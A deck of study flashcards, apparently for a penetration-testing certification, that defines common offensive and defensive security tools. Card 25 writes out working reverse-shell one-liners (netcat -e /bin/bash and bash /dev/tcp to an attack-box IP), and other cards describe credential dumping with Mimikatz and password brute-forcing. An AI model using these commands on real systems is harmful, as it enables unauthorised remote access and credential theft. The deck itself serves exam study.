TOOLS Flashcards

1
Q

BeEF

A

browser exploitation framework –> XSS & Injection

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Netcat

A

TCP/UDP connections

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Nikto

A

web application vulnerability scanner.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Androzer

A

test android apps

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Swagger

A

API testing

open-source framework with large system of tools to design, build, doc, etc, REST Web Services

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

W3AF

A

open source we application security scanner

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Shodan

A

cloud based tool for finding open ports and unpatched PCs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

CeWL

A

CeWL (Custom Word List generator) is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. Optionally, CeWL can follow external links.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

OpenVAS

A

open source vulnerability scanner

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

SET

A

social engineering toolkit

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Reponder

A

Poisons LLMNR / NBT-NS/ MDNS traffic.

If a client/target cannot resolve a name via DNS it will fall back to name resolution via LLMNR (introduced in Windows Vista) and NBT-NS.

Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Mimikatz

A

a popular post-exploitation tool that dumps passwords, hashes, PINs, and Kerberos tickets from memory.

It also allows for pass-the-hash, pass-the-ticket, and the creation of Golden Kerberos tickets,

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

NCRACK

A

Ncrack is a very fast ONLINE password brute-force tool from the Nmap team.

But it can only be used for a limited set of protocols:
• FTP
• Telnet
• SSH
• RDP
• VNC
• HTTP(S) (basic authentication)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Hydra

A

Hydra is a brute-forcing tool that can crack systems using password guessing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

Maltego

A

OSINT

visualization of data relationships gathered from OSINT efforts.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Mimikatz

A

able to access the LSASS (Local Security Authority Subsystem Service) memory space and extract these clear-text credentials (crack passwords)

kerberos auth golden ticket

17
Q

Credential testing tools

A
Hashcat
Medusa
Hydra
CeWL
John the Ripper
Cain and Abel
Mimikatz
Patator
Dirbuster
W3AF
18
Q

Harvester

A

OSINT

gathers emails, domains, hosts employee names, open ports, banners

19
Q

Empire

A

powershell exploitation tool

20
Q

Findbugs / Spotbugs

A

a static code analyzer for Java applications

21
Q

tcpdump

A

a command-line exclusive tool that allows sniffing network traffic and packets

22
Q

Reaver

A

cracks WPS enabled wifi router (get’s PIN)

23
Q

Sqlmap

A

database vulnerability scanner

24
Q

Hashcat

A

password cracking / recovery tool, one of the fastest because it also uses the power of the GPU as well as that of the classic CPU.

25
Q

Reverse Shell

A

Netcat

  nc –lvp 4444 ----> setup a Netcat listener on the attack box

  nc 192.168.100.113 4444 –e /bin/bash ----> issue the following command on the target host to connect to our attack box

Bash

  bash -i >& /dev/tcp/192.168.100.113/4444 0>&1
26
Q

IDA

A

interactive disassembler - and debugger

generates assembly language source code from machine-executable code. It supports a variety of executable formats for different processors and operating systems. It also can be used as a debugger for Windows PE, Mac OS X Mach-O, and Linux ELF executables. A decompiler plug-in for programs compiled with a C/C++ compiler is available at extra cost.

27
Q

Software Assurance

A

Findbugs. - security audits java code
Peach. - fuzzing / dynamic
AFL. - american fuzzy lop = fuzer
SonarQube - static code analysis many languages
YASCA. - software scanner / fuzzing / plugins

28
Q

Harvester

A

OSINT to collect email addresses

29
Q

Vulnerability Scanners

A
Nikto
OpenVAS
Nessus
sqlmap
W3AF
nmap
metasploit